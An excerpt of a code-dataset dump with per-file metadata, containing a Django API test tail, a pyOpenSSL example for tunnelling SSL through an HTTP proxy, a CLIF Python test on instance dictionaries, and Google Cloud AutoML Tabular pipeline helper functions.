self.assertFalse(updated.enabled)
self.assertMessengerBot(data['id'], data['created_at'], data['updated_at'], data['token'], data['enabled'], updated)
def test_put_messenger_bot_not_auth(self):
self._test_put_detail_not_auth(self._messenger_bot_detail_url(),
{'token': self.my_api_key, 'enabled': 'False'},
MessengerBotDetail, self.bot.pk, self.bot.messenger_bot.pk)
def test_put_messenger_bot_not_found(self):
self._test_put_detail_not_found(self._messenger_bot_detail_url(messenger_bot_pk=self.unlikely_id),
{'token': self.my_api_key, 'enabled': 'False'},
MessengerBotDetail, self.bot.pk, self.unlikely_id)
def test_delete_messenger_bot_ok(self):
self._test_delete_detail_ok(self._messenger_bot_detail_url(), MessengerBotDetail, self.bot.pk, self.bot.messenger_bot.pk)
self.assertEqual(MessengerBot.objects.count(), 0)
def test_delete_messenger_bot_not_auth(self):
self._test_delete_detail_not_auth(self._messenger_bot_detail_url(), MessengerBotDetail, self.bot.pk, self.bot.messenger_bot.pk)
def test_delete_messenger_bot_not_found(self):
self._test_delete_detail_not_found(self._messenger_bot_detail_url(messenger_bot_pk=self.unlikely_id), MessengerBotDetail, self.bot.pk, self.unlikely_id)
| 56.956298
| 160
| 0.663071
|
3be26f90524b0bce15f41ccddceb6318027e2639
| 1,877
|
py
|
Python
|
examples/proxy.py
|
khadas/android_external_python_pyopenssl
|
751caf63d05da8477d934da5c05316ddeb4f64de
|
[
"Apache-2.0"
] | 5,079
|
2015-01-01T03:39:46.000Z
|
2022-03-31T07:38:22.000Z
|
examples/proxy.py
|
khadas/android_external_python_pyopenssl
|
751caf63d05da8477d934da5c05316ddeb4f64de
|
[
"Apache-2.0"
] | 1,623
|
2015-01-01T08:06:24.000Z
|
2022-03-30T19:48:52.000Z
|
examples/proxy.py
|
khadas/android_external_python_pyopenssl
|
751caf63d05da8477d934da5c05316ddeb4f64de
|
[
"Apache-2.0"
] | 2,033
|
2015-01-04T07:18:02.000Z
|
2022-03-28T19:55:47.000Z
|
#!/usr/bin/env python
#
# This script demonstrates how one can use pyOpenSSL to speak SSL over an HTTP
# proxy
# The challenge here is to start talking SSL over an already connected socket
#
# Author: Mihai Ibanescu <misa@redhat.com>
#
# $Id: proxy.py,v 1.2 2004/07/22 12:01:25 martin Exp $
import sys
import socket
import string
from OpenSSL import SSL
def usage(exit_code=0):
print "Usage: %s server[:port] proxy[:port]" % sys.argv[0]
print " Connects SSL to the specified server (port 443 by default)"
print " using the specified proxy (port 8080 by default)"
sys.exit(exit_code)
def main():
# Command-line processing
if len(sys.argv) != 3:
usage(-1)
server, proxy = sys.argv[1:3]
run(split_host(server, 443), split_host(proxy, 8080))
def split_host(hostname, default_port=80):
a = string.split(hostname, ':', 1)
if len(a) == 1:
a.append(default_port)
return a[0], int(a[1])
# Connects to the server, through the proxy
def run(server, proxy):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
s.connect(proxy)
except socket.error, e:
print "Unable to connect to %s:%s %s" % (proxy[0], proxy[1], str(e))
sys.exit(-1)
# Use the CONNECT method to get a connection to the actual server
s.send("CONNECT %s:%s HTTP/1.0\n\n" % (server[0], server[1]))
print "Proxy response: %s" % string.strip(s.recv(1024))
ctx = SSL.Context(SSL.SSLv23_METHOD)
conn = SSL.Connection(ctx, s)
# Go to client mode
conn.set_connect_state()
# start using HTTP
conn.send("HEAD / HTTP/1.0\n\n")
print "Sever response:"
print "-" * 40
while 1:
try:
buff = conn.recv(4096)
except SSL.ZeroReturnError:
# we're done
break
print buff,
if __name__ == '__main__':
main()
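# --- Editor's sketch (not part of the original example) ----------------------
# A rough Python 3 equivalent using only the standard library, assuming the
# proxy accepts a plain HTTP CONNECT request. The idea is the same as above:
# connect a TCP socket to the proxy first, then start TLS on that
# already-connected socket. The name https_via_proxy is illustrative only.
#
#   import socket, ssl
#
#   def https_via_proxy(server, proxy):
#       s = socket.create_connection(proxy)
#       s.sendall(("CONNECT %s:%d HTTP/1.0\r\n\r\n" % server).encode("ascii"))
#       print("Proxy response:", s.recv(1024).decode("latin-1").strip())
#       ctx = ssl.create_default_context()        # verifies the server cert
#       conn = ctx.wrap_socket(s, server_hostname=server[0])
#       conn.sendall(b"HEAD / HTTP/1.0\r\n\r\n")
#       while True:
#           buff = conn.recv(4096)
#           if not buff:
#               break
#           print(buff.decode("latin-1"), end="")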
| 24.064103
| 78
| 0.627597
|
ea9e3a4a10ff228798376d3473b28b56a36da1d0
| 3,436
|
py
|
Python
|
clif/testing/python/enable_instance_dict_test.py
|
sr-gi/clif
|
39c511e5caccd203d261d97717acde8ec124f44c
|
[
"Apache-2.0"
] | null | null | null |
clif/testing/python/enable_instance_dict_test.py
|
sr-gi/clif
|
39c511e5caccd203d261d97717acde8ec124f44c
|
[
"Apache-2.0"
] | null | null | null |
clif/testing/python/enable_instance_dict_test.py
|
sr-gi/clif
|
39c511e5caccd203d261d97717acde8ec124f44c
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import sys
import unittest
import parameterized
from clif.testing.python import enable_instance_dict
TYPES_WITH_DICT = (
enable_instance_dict.ConcreteEmptyWithDict,
enable_instance_dict.ConcreteEmptyWithDictFinal,
enable_instance_dict.ConcreteNonTrivialDestructorWithDict)
###############################################################################
# NOTE: The sys.getrefcount() tests in this file are highly conclusive if #
# they work, but make assumptions about Python's behavior that may #
# not necessarily be true in the future. If you see these tests failing #
# with new versions of Python, they may need to be adjusted. #
###############################################################################
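# Editor's note (sketch, not part of the original test): sys.getrefcount(x)
# always reports one more reference than the bindings you can see, because the
# argument passed to getrefcount is itself a temporary reference, e.g.
#   d = {}
#   sys.getrefcount(d)  # -> 2 on CPython: the local name plus the call argument
# That extra reference is why the assertions below compare against 2 and 3.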
class ClassModuleAttrTest(unittest.TestCase):
def testConcreteEmptyNoDict(self):
obj = enable_instance_dict.ConcreteEmptyNoDict()
self.assertFalse(hasattr(obj, '__dict__'))
@parameterized.parameterized.expand(zip(TYPES_WITH_DICT))
def testConcreteEmptyWithDict(self, type_with_dict):
obj = type_with_dict()
self.assertTrue(hasattr(obj, '__dict__'))
self.assertEqual(len(obj.__dict__), 0)
obj.color = 'red'
self.assertEqual(len(obj.__dict__), 1)
obj.height = '13'
self.assertEqual(len(obj.__dict__), 2)
with self.assertRaises(TypeError) as ctx:
obj.__dict__ = ''
self.assertEqual(
str(ctx.exception),
'__dict__ must be set to a dict, not a str')
initial_dict = obj.__dict__
self.assertEqual(sys.getrefcount(initial_dict), 3)
obj.__dict__ = {'seven': 7, 'ate': 8, 'nine': 9}
self.assertEqual(sys.getrefcount(initial_dict), 2)
self.assertEqual(len(obj.__dict__), 3)
replacement_dict = obj.__dict__
self.assertEqual(sys.getrefcount(replacement_dict), 3)
del obj
self.assertEqual(sys.getrefcount(replacement_dict), 2)
@parameterized.parameterized.expand(zip(TYPES_WITH_DICT))
def testReferenceCycle(self, type_with_dict):
obj = type_with_dict()
obj.cycle = obj
obj_dict = obj.__dict__
self.assertEqual(sys.getrefcount(obj_dict), 3)
del obj
self.assertEqual(sys.getrefcount(obj_dict), 3) # NOT 2
del obj_dict['cycle'] # breaks the reference cycle
self.assertEqual(sys.getrefcount(obj_dict), 2)
def testConcreteEmptyWithDictFinal(self):
# Minimal runtime testing. The main purpose of ConcreteEmptyWithDictFinal
# is to test that the .clif file parser can handle multiple decorators.
with self.assertRaises(TypeError) as ctx:
class _(enable_instance_dict.ConcreteEmptyWithDictFinal):
pass
self.assertIn('is not an acceptable base type', str(ctx.exception))
if __name__ == '__main__':
unittest.main()
| 37.347826
| 79
| 0.703434
|
563e4cde2b6ffa9c1715cf1963b82f6591b77577
| 56,952
|
py
|
Python
|
components/google-cloud/google_cloud_pipeline_components/experimental/automl/tabular/utils.py
|
connor-mccarthy/pipelines
|
afe07f1d43a75838ab8e6788b6cd604877dbb4bb
|
[
"Apache-2.0"
] | null | null | null |
components/google-cloud/google_cloud_pipeline_components/experimental/automl/tabular/utils.py
|
connor-mccarthy/pipelines
|
afe07f1d43a75838ab8e6788b6cd604877dbb4bb
|
[
"Apache-2.0"
] | null | null | null |
components/google-cloud/google_cloud_pipeline_components/experimental/automl/tabular/utils.py
|
connor-mccarthy/pipelines
|
afe07f1d43a75838ab8e6788b6cd604877dbb4bb
|
[
"Apache-2.0"
] | null | null | null |
"""Util functions for AutoML Tabular pipeline."""
import json
import math
import os
import pathlib
from typing import Any, Dict, List, Tuple, Optional
_DEFAULT_NUM_PARALLEL_TRAILS = 35
_DEFAULT_STAGE_2_NUM_SELECTED_TRAILS = 5
_NUM_FOLDS = 5
_DISTILL_TOTAL_TRIALS = 100
def input_dictionary_to_parameter(input_dict: Optional[Dict[str, Any]]) -> str:
"""Convert json input dict to encoded parameter string.
This function is required due to the limitation on YAML component definition
that YAML definition does not have a keyword for apply quote escape, so the
JSON argument's quote must be manually escaped using this function.
Args:
input_dict: The input json dictionary.
Returns:
The encoded string used for parameter.
"""
if not input_dict:
return ''
out = json.dumps(json.dumps(input_dict))
return out[1:-1] # remove the outside quotes, e.g., "foo" -> foo
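# Editor's sketch (not part of the original module): a quick illustration of
# the quote-escaping behaviour documented above. The helper name below is
# hypothetical and exists only for this example.
def _example_input_dictionary_to_parameter():
  # Double json.dumps escapes the inner quotes; stripping the outer quotes
  # leaves e.g. {\"foo\": \"bar\"} for the input {'foo': 'bar'}.
  escaped = input_dictionary_to_parameter({'foo': 'bar'})
  assert escaped == '{\\"foo\\": \\"bar\\"}'
  return escaped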
def get_skip_evaluation_pipeline_and_parameters(
project: str,
location: str,
root_dir: str,
target_column_name: str,
prediction_type: str,
optimization_objective: str,
transformations: Dict[str, Any],
split_spec: Dict[str, Any],
data_source: Dict[str, Any],
train_budget_milli_node_hours: float,
stage_1_num_parallel_trials: int = _DEFAULT_NUM_PARALLEL_TRAILS,
stage_2_num_parallel_trials: int = _DEFAULT_NUM_PARALLEL_TRAILS,
stage_2_num_selected_trials: int = _DEFAULT_STAGE_2_NUM_SELECTED_TRAILS,
weight_column_name: str = '',
study_spec_override: Optional[Dict[str, Any]] = None,
optimization_objective_recall_value: float = -1,
optimization_objective_precision_value: float = -1,
stage_1_tuner_worker_pool_specs_override: Optional[Dict[str, Any]] = None,
cv_trainer_worker_pool_specs_override: Optional[Dict[str, Any]] = None,
export_additional_model_without_custom_ops: bool = False,
stats_and_example_gen_dataflow_machine_type: str = 'n1-standard-16',
stats_and_example_gen_dataflow_max_num_workers: int = 25,
stats_and_example_gen_dataflow_disk_size_gb: int = 40,
transform_dataflow_machine_type: str = 'n1-standard-16',
transform_dataflow_max_num_workers: int = 25,
transform_dataflow_disk_size_gb: int = 40,
dataflow_subnetwork: str = '',
dataflow_use_public_ips: bool = True,
encryption_spec_key_name: str = '',
additional_experiments: Optional[Dict[str, Any]] = None
) -> Tuple[str, Dict[str, Any]]:
"""Get the AutoML Tabular training pipeline that skips evaluation.
Args:
project: The GCP project that runs the pipeline components.
location: The GCP region that runs the pipeline components.
root_dir: The root GCS directory for the pipeline components.
target_column_name: The target column name.
prediction_type: The type of prediction the model is to produce.
"classification" or "regression".
optimization_objective: For binary classification, "maximize-au-roc",
"minimize-log-loss", "maximize-au-prc", "maximize-precision-at-recall", or
"maximize-recall-at-precision". For multi class classification,
"minimize-log-loss". For regression, "minimize-rmse", "minimize-mae", or
"minimize-rmsle".
transformations: The transformations to apply.
split_spec: The split spec.
data_source: The data source.
train_budget_milli_node_hours: The train budget of creating this model,
      expressed in milli node hours, i.e. a value of 1,000 in this field means
      one node hour.
    stage_1_num_parallel_trials: Number of parallel trials for stage 1.
    stage_2_num_parallel_trials: Number of parallel trials for stage 2.
stage_2_num_selected_trials: Number of selected trials for stage 2.
weight_column_name: The weight column name.
study_spec_override: The dictionary for overriding study spec. The
dictionary should be of format
https://github.com/googleapis/googleapis/blob/4e836c7c257e3e20b1de14d470993a2b1f4736a8/google/cloud/aiplatform/v1beta1/study.proto#L181.
optimization_objective_recall_value: Required when optimization_objective is
"maximize-precision-at-recall". Must be between 0 and 1, inclusive.
optimization_objective_precision_value: Required when optimization_objective
is "maximize-recall-at-precision". Must be between 0 and 1, inclusive.
    stage_1_tuner_worker_pool_specs_override: The dictionary for overriding
stage 1 tuner worker pool spec. The dictionary should be of format
https://github.com/googleapis/googleapis/blob/4e836c7c257e3e20b1de14d470993a2b1f4736a8/google/cloud/aiplatform/v1beta1/custom_job.proto#L172.
cv_trainer_worker_pool_specs_override: The dictionary for overriding stage
cv trainer worker pool spec. The dictionary should be of format
https://github.com/googleapis/googleapis/blob/4e836c7c257e3e20b1de14d470993a2b1f4736a8/google/cloud/aiplatform/v1beta1/custom_job.proto#L172.
export_additional_model_without_custom_ops: Whether to export additional
model without custom TensorFlow operators.
stats_and_example_gen_dataflow_machine_type: The dataflow machine type for
stats_and_example_gen component.
stats_and_example_gen_dataflow_max_num_workers: The max number of Dataflow
workers for stats_and_example_gen component.
stats_and_example_gen_dataflow_disk_size_gb: Dataflow worker's disk size in
GB for stats_and_example_gen component.
transform_dataflow_machine_type: The dataflow machine type for transform
component.
transform_dataflow_max_num_workers: The max number of Dataflow workers for
transform component.
transform_dataflow_disk_size_gb: Dataflow worker's disk size in GB for
transform component.
dataflow_subnetwork: Dataflow's fully qualified subnetwork name, when empty
the default
subnetwork will be used. Example:
https://cloud.google.com/dataflow/docs/guides/specifying-networks#example_network_and_subnetwork_specifications
dataflow_use_public_ips: Specifies whether Dataflow workers use public IP
addresses.
encryption_spec_key_name: The KMS key name.
Returns:
    Tuple of pipeline_definition_path and parameter_values.
"""
if stage_1_num_parallel_trials <= 0:
stage_1_num_parallel_trials = _DEFAULT_NUM_PARALLEL_TRAILS
if stage_2_num_parallel_trials <= 0:
stage_2_num_parallel_trials = _DEFAULT_NUM_PARALLEL_TRAILS
hours = float(train_budget_milli_node_hours) / 1000.0
multiplier = stage_1_num_parallel_trials * hours / 500.0
stage_1_single_run_max_secs = int(math.sqrt(multiplier) * 2400.0)
phase_2_rounds = int(
math.sqrt(multiplier) * 100 / stage_2_num_parallel_trials + 0.5)
if phase_2_rounds < 1:
phase_2_rounds = 1
  # The magic number 1.3 below is used because a trial doesn't always finish
  # within time_per_trial; 1.3 is an empirical safety margin.
stage_1_deadline_secs = int(hours * 3600.0 - 1.3 *
stage_1_single_run_max_secs * phase_2_rounds)
if stage_1_deadline_secs < hours * 3600.0 * 0.5:
stage_1_deadline_secs = int(hours * 3600.0 * 0.5)
# Phase 1 deadline is the same as phase 2 deadline in this case. Phase 2
# can't finish in time after the deadline is cut, so adjust the time per
# trial to meet the deadline.
stage_1_single_run_max_secs = int(stage_1_deadline_secs /
(1.3 * phase_2_rounds))
reduce_search_space_mode = 'minimal'
if multiplier > 2:
reduce_search_space_mode = 'regular'
if multiplier > 4:
reduce_search_space_mode = 'full'
# Stage 2 number of trials is stage_1_num_selected_trials *
# _NUM_FOLDS, which should be equal to phase_2_rounds *
# stage_2_num_parallel_trials. Use this information to calculate
# stage_1_num_selected_trials:
stage_1_num_selected_trials = int(phase_2_rounds *
stage_2_num_parallel_trials / _NUM_FOLDS)
stage_1_deadline_hours = stage_1_deadline_secs / 3600.0
stage_2_deadline_hours = hours - stage_1_deadline_hours
stage_2_single_run_max_secs = stage_1_single_run_max_secs
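  # Worked example (editor's note, not part of the original module): with the
  # default 35 parallel trials and train_budget_milli_node_hours=1000 (1 hour):
  #   multiplier = 35 * 1.0 / 500 = 0.07, sqrt(0.07) ~= 0.2646
  #   stage_1_single_run_max_secs = int(0.2646 * 2400) = 635
  #   phase_2_rounds = int(0.2646 * 100 / 35 + 0.5) = 1
  #   stage_1_deadline_secs = int(3600 - 1.3 * 635 * 1) = 2774 (> half the budget)
  #   stage_1_num_selected_trials = int(1 * 35 / 5) = 7
  # so roughly 0.77 h goes to stage 1 and the remaining 0.23 h to stage 2.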
parameter_values = {
'project':
project,
'location':
location,
'root_dir':
root_dir,
'target_column_name':
target_column_name,
'prediction_type':
prediction_type,
'optimization_objective':
optimization_objective,
'transformations':
input_dictionary_to_parameter(transformations),
'split_spec':
input_dictionary_to_parameter(split_spec),
'data_source':
input_dictionary_to_parameter(data_source),
'stage_1_deadline_hours':
stage_1_deadline_hours,
'stage_1_num_parallel_trials':
stage_1_num_parallel_trials,
'stage_1_num_selected_trials':
stage_1_num_selected_trials,
'stage_1_single_run_max_secs':
stage_1_single_run_max_secs,
'reduce_search_space_mode':
reduce_search_space_mode,
'stage_2_deadline_hours':
stage_2_deadline_hours,
'stage_2_num_parallel_trials':
stage_2_num_parallel_trials,
'stage_2_num_selected_trials':
stage_2_num_selected_trials,
'stage_2_single_run_max_secs':
stage_2_single_run_max_secs,
'weight_column_name':
weight_column_name,
'optimization_objective_recall_value':
optimization_objective_recall_value,
'optimization_objective_precision_value':
optimization_objective_precision_value,
'study_spec_override':
input_dictionary_to_parameter(study_spec_override),
'stage_1_tuner_worker_pool_specs_override':
input_dictionary_to_parameter(stage_1_tuner_worker_pool_specs_override
),
'cv_trainer_worker_pool_specs_override':
input_dictionary_to_parameter(cv_trainer_worker_pool_specs_override),
'export_additional_model_without_custom_ops':
export_additional_model_without_custom_ops,
'stats_and_example_gen_dataflow_machine_type':
stats_and_example_gen_dataflow_machine_type,
'stats_and_example_gen_dataflow_max_num_workers':
stats_and_example_gen_dataflow_max_num_workers,
'stats_and_example_gen_dataflow_disk_size_gb':
stats_and_example_gen_dataflow_disk_size_gb,
'transform_dataflow_machine_type':
transform_dataflow_machine_type,
'transform_dataflow_max_num_workers':
transform_dataflow_max_num_workers,
'transform_dataflow_disk_size_gb':
transform_dataflow_disk_size_gb,
'dataflow_subnetwork':
dataflow_subnetwork,
'dataflow_use_public_ips':
dataflow_use_public_ips,
'encryption_spec_key_name':
encryption_spec_key_name,
'additional_experiments':
input_dictionary_to_parameter(additional_experiments),
}
if additional_experiments:
parameter_values.update({
'additional_experiments':
input_dictionary_to_parameter(additional_experiments)})
pipeline_definition_path = os.path.join(
pathlib.Path(__file__).parent.resolve(), 'skip_evaluation_pipeline.json')
return pipeline_definition_path, parameter_values
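# Editor's sketch (not part of the original module): a typical call pattern.
# The dict shapes below (transformations, split_spec, data_source) are
# illustrative assumptions only; the helper simply JSON-encodes them, so the
# call runs either way, but the canonical schemas are defined by the pipeline.
def _example_get_skip_evaluation_pipeline_and_parameters():
  return get_skip_evaluation_pipeline_and_parameters(
      project='my-project',                     # assumed GCP project id
      location='us-central1',
      root_dir='gs://my-bucket/pipeline-root',  # assumed GCS root
      target_column_name='label',
      prediction_type='classification',
      optimization_objective='maximize-au-roc',
      transformations={'auto': {'column_name': 'feature_1'}},
      split_spec={'fraction_split': {'training_fraction': 0.8,
                                     'validation_fraction': 0.1,
                                     'test_fraction': 0.1}},
      data_source={'csv_data_source': {'csv_filenames': ['gs://my-bucket/data.csv']}},
      train_budget_milli_node_hours=1000)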
# TODO(helin): Remove *args in the argument section for getting pipelines.
def get_default_pipeline_and_parameters(
*args,
dataflow_service_account: str = '',
evaluation_batch_predict_machine_type: str = 'n1-standard-16',
evaluation_batch_predict_starting_replica_count: int = 25,
evaluation_batch_predict_max_replica_count: int = 25,
evaluation_dataflow_machine_type: str = 'n1-standard-4',
evaluation_dataflow_max_num_workers: int = 25,
evaluation_dataflow_disk_size_gb: int = 50,
**kwargs) -> Tuple[str, Dict[str, Any]]:
"""Get the AutoML Tabular default training pipeline.
Args:
*args: All arguments in `get_skip_evaluation_pipeline_and_parameters`.
dataflow_service_account: Custom service account to run dataflow jobs.
evaluation_batch_predict_machine_type: The prediction server machine type
for batch predict components during evaluation.
evaluation_batch_predict_starting_replica_count: The initial number of
prediction server for batch predict components during evaluation.
evaluation_batch_predict_max_replica_count: The max number of prediction
server for batch predict components during evaluation.
evaluation_dataflow_machine_type: The dataflow machine type for evaluation
components.
evaluation_dataflow_max_num_workers: The max number of Dataflow workers for
evaluation components.
evaluation_dataflow_disk_size_gb: Dataflow worker's disk size in GB for
evaluation components.
**kwargs: All arguments in `get_skip_evaluation_pipeline_and_parameters`.
Returns:
    Tuple of pipeline_definition_path and parameter_values.
"""
_, parameter_values = get_skip_evaluation_pipeline_and_parameters(
*args, **kwargs)
parameter_values.update({
'dataflow_service_account':
dataflow_service_account,
'evaluation_batch_predict_machine_type':
evaluation_batch_predict_machine_type,
'evaluation_batch_predict_starting_replica_count':
evaluation_batch_predict_starting_replica_count,
'evaluation_batch_predict_max_replica_count':
evaluation_batch_predict_max_replica_count,
'evaluation_dataflow_machine_type':
evaluation_dataflow_machine_type,
'evaluation_dataflow_max_num_workers':
evaluation_dataflow_max_num_workers,
'evaluation_dataflow_disk_size_gb':
evaluation_dataflow_disk_size_gb,
})
pipeline_definition_path = os.path.join(
pathlib.Path(__file__).parent.resolve(), 'default_pipeline.json')
return pipeline_definition_path, parameter_values
def get_feature_selection_skip_evaluation_pipeline_and_parameters(
project: str,
location: str,
root_dir: str,
target_column_name: str,
prediction_type: str,
optimization_objective: str,
transformations: Dict[str, Any],
split_spec: Dict[str, Any],
data_source: Dict[str, Any],
max_selected_features: int,
train_budget_milli_node_hours: float,
stage_1_num_parallel_trials: int = _DEFAULT_NUM_PARALLEL_TRAILS,
stage_2_num_parallel_trials: int = _DEFAULT_NUM_PARALLEL_TRAILS,
stage_2_num_selected_trials: int = _DEFAULT_STAGE_2_NUM_SELECTED_TRAILS,
weight_column_name: str = '',
study_spec_override: Optional[Dict[str, Any]] = None,
optimization_objective_recall_value: float = -1,
optimization_objective_precision_value: float = -1,
stage_1_tuner_worker_pool_specs_override: Optional[Dict[str, Any]] = None,
cv_trainer_worker_pool_specs_override: Optional[Dict[str, Any]] = None,
export_additional_model_without_custom_ops: bool = False,
stats_and_example_gen_dataflow_machine_type: str = 'n1-standard-16',
stats_and_example_gen_dataflow_max_num_workers: int = 25,
stats_and_example_gen_dataflow_disk_size_gb: int = 40,
transform_dataflow_machine_type: str = 'n1-standard-16',
transform_dataflow_max_num_workers: int = 25,
transform_dataflow_disk_size_gb: int = 40,
dataflow_subnetwork: str = '',
dataflow_use_public_ips: bool = True,
encryption_spec_key_name: str = '') -> Tuple[str, Dict[str, Any]]:
"""Get the AutoML Tabular training pipeline that skips evaluation.
Args:
project: The GCP project that runs the pipeline components.
location: The GCP region that runs the pipeline components.
root_dir: The root GCS directory for the pipeline components.
target_column_name: The target column name.
prediction_type: The type of prediction the model is to produce.
"classification" or "regression".
optimization_objective: For binary classification, "maximize-au-roc",
"minimize-log-loss", "maximize-au-prc", "maximize-precision-at-recall", or
"maximize-recall-at-precision". For multi class classification,
"minimize-log-loss". For regression, "minimize-rmse", "minimize-mae", or
"minimize-rmsle".
transformations: The transformations to apply.
split_spec: The split spec.
data_source: The data source.
max_selected_features: number of features to be selected.
train_budget_milli_node_hours: The train budget of creating this model,
      expressed in milli node hours, i.e. a value of 1,000 in this field means
      one node hour.
    stage_1_num_parallel_trials: Number of parallel trials for stage 1.
    stage_2_num_parallel_trials: Number of parallel trials for stage 2.
stage_2_num_selected_trials: Number of selected trials for stage 2.
weight_column_name: The weight column name.
study_spec_override: The dictionary for overriding study spec. The
dictionary should be of format
https://github.com/googleapis/googleapis/blob/4e836c7c257e3e20b1de14d470993a2b1f4736a8/google/cloud/aiplatform/v1beta1/study.proto#L181.
optimization_objective_recall_value: Required when optimization_objective is
"maximize-precision-at-recall". Must be between 0 and 1, inclusive.
optimization_objective_precision_value: Required when optimization_objective
is "maximize-recall-at-precision". Must be between 0 and 1, inclusive.
    stage_1_tuner_worker_pool_specs_override: The dictionary for overriding
stage 1 tuner worker pool spec. The dictionary should be of format
https://github.com/googleapis/googleapis/blob/4e836c7c257e3e20b1de14d470993a2b1f4736a8/google/cloud/aiplatform/v1beta1/custom_job.proto#L172.
cv_trainer_worker_pool_specs_override: The dictionary for overriding stage
cv trainer worker pool spec. The dictionary should be of format
https://github.com/googleapis/googleapis/blob/4e836c7c257e3e20b1de14d470993a2b1f4736a8/google/cloud/aiplatform/v1beta1/custom_job.proto#L172.
export_additional_model_without_custom_ops: Whether to export additional
model without custom TensorFlow operators.
stats_and_example_gen_dataflow_machine_type: The dataflow machine type for
stats_and_example_gen component.
stats_and_example_gen_dataflow_max_num_workers: The max number of Dataflow
workers for stats_and_example_gen component.
stats_and_example_gen_dataflow_disk_size_gb: Dataflow worker's disk size in
GB for stats_and_example_gen component.
transform_dataflow_machine_type: The dataflow machine type for transform
component.
transform_dataflow_max_num_workers: The max number of Dataflow workers for
transform component.
transform_dataflow_disk_size_gb: Dataflow worker's disk size in GB for
transform component.
dataflow_subnetwork: Dataflow's fully qualified subnetwork name, when empty
the default
subnetwork will be used. Example:
https://cloud.google.com/dataflow/docs/guides/specifying-networks#example_network_and_subnetwork_specifications
dataflow_use_public_ips: Specifies whether Dataflow workers use public IP
addresses.
encryption_spec_key_name: The KMS key name.
Returns:
Tuple of pipeline_definition_path and parameter_values.
"""
_, parameter_values = get_skip_evaluation_pipeline_and_parameters(
project=project,
location=location,
root_dir=root_dir,
target_column_name=target_column_name,
prediction_type=prediction_type,
optimization_objective=optimization_objective,
transformations=transformations,
split_spec=split_spec,
data_source=data_source,
train_budget_milli_node_hours=train_budget_milli_node_hours,
stage_1_num_parallel_trials=stage_1_num_parallel_trials,
stage_2_num_parallel_trials=stage_2_num_parallel_trials,
stage_2_num_selected_trials=stage_2_num_selected_trials,
weight_column_name=weight_column_name,
study_spec_override=study_spec_override,
optimization_objective_recall_value=optimization_objective_recall_value,
optimization_objective_precision_value=optimization_objective_precision_value,
stage_1_tuner_worker_pool_specs_override=stage_1_tuner_worker_pool_specs_override,
cv_trainer_worker_pool_specs_override=cv_trainer_worker_pool_specs_override,
export_additional_model_without_custom_ops=export_additional_model_without_custom_ops,
stats_and_example_gen_dataflow_machine_type=stats_and_example_gen_dataflow_machine_type,
stats_and_example_gen_dataflow_max_num_workers=stats_and_example_gen_dataflow_max_num_workers,
stats_and_example_gen_dataflow_disk_size_gb=stats_and_example_gen_dataflow_disk_size_gb,
transform_dataflow_machine_type=transform_dataflow_machine_type,
transform_dataflow_max_num_workers=transform_dataflow_max_num_workers,
transform_dataflow_disk_size_gb=transform_dataflow_disk_size_gb,
dataflow_use_public_ips=dataflow_use_public_ips,
dataflow_subnetwork=dataflow_subnetwork,
encryption_spec_key_name=encryption_spec_key_name)
parameter_values['max_selected_features'] = max_selected_features
pipeline_definition_path = os.path.join(
pathlib.Path(__file__).parent.resolve(),
'feature_selection_skip_evaluation_pipeline.json')
return pipeline_definition_path, parameter_values
def get_skip_architecture_search_pipeline_and_parameters(
project: str,
location: str,
root_dir: str,
target_column_name: str,
prediction_type: str,
optimization_objective: str,
transformations: Dict[str, Any],
split_spec: Dict[str, Any],
data_source: Dict[str, Any],
train_budget_milli_node_hours: float,
stage_1_tuning_result_artifact_uri: str,
stage_2_num_parallel_trials: int = _DEFAULT_NUM_PARALLEL_TRAILS,
stage_2_num_selected_trials: int = _DEFAULT_STAGE_2_NUM_SELECTED_TRAILS,
weight_column_name: str = '',
optimization_objective_recall_value: float = -1,
optimization_objective_precision_value: float = -1,
cv_trainer_worker_pool_specs_override: Optional[Dict[str, Any]] = None,
export_additional_model_without_custom_ops: bool = False,
stats_and_example_gen_dataflow_machine_type: str = 'n1-standard-16',
stats_and_example_gen_dataflow_max_num_workers: int = 25,
transform_dataflow_machine_type: str = 'n1-standard-16',
transform_dataflow_max_num_workers: int = 25,
dataflow_subnetwork: str = '',
dataflow_use_public_ips: bool = True,
encryption_spec_key_name: str = '') -> Tuple[str, Dict[str, Any]]:
"""Get the AutoML Tabular training pipeline that skips architecture search.
Args:
project: The GCP project that runs the pipeline components.
location: The GCP region that runs the pipeline components.
root_dir: The root GCS directory for the pipeline components.
target_column_name: The target column name.
prediction_type: The type of prediction the model is to produce.
"classification" or "regression".
optimization_objective: For binary classification, "maximize-au-roc",
"minimize-log-loss", "maximize-au-prc", "maximize-precision-at-recall", or
"maximize-recall-at-precision". For multi class classification,
"minimize-log-loss". For regression, "minimize-rmse", "minimize-mae", or
"minimize-rmsle".
transformations: The transformations to apply.
split_spec: The split spec.
data_source: The data source.
train_budget_milli_node_hours: The train budget of creating this model,
      expressed in milli node hours, i.e. a value of 1,000 in this field means
      one node hour.
stage_1_tuning_result_artifact_uri: The stage 1 tuning result artifact GCS
URI.
    stage_2_num_parallel_trials: Number of parallel trials for stage 2.
stage_2_num_selected_trials: Number of selected trials for stage 2.
weight_column_name: The weight column name.
optimization_objective_recall_value: Required when optimization_objective is
"maximize-precision-at-recall". Must be between 0 and 1, inclusive.
optimization_objective_precision_value: Required when optimization_objective
is "maximize-recall-at-precision". Must be between 0 and 1, inclusive.
cv_trainer_worker_pool_specs_override: The dictionary for overriding stage
cv trainer worker pool spec. The dictionary should be of format
https://github.com/googleapis/googleapis/blob/4e836c7c257e3e20b1de14d470993a2b1f4736a8/google/cloud/aiplatform/v1beta1/custom_job.proto#L172.
export_additional_model_without_custom_ops: Whether to export additional
model without custom TensorFlow operators.
stats_and_example_gen_dataflow_machine_type: The dataflow machine type for
stats_and_example_gen component.
stats_and_example_gen_dataflow_max_num_workers: The max number of Dataflow
workers for stats_and_example_gen component.
transform_dataflow_machine_type: The dataflow machine type for transform
component.
transform_dataflow_max_num_workers: The max number of Dataflow workers for
transform component.
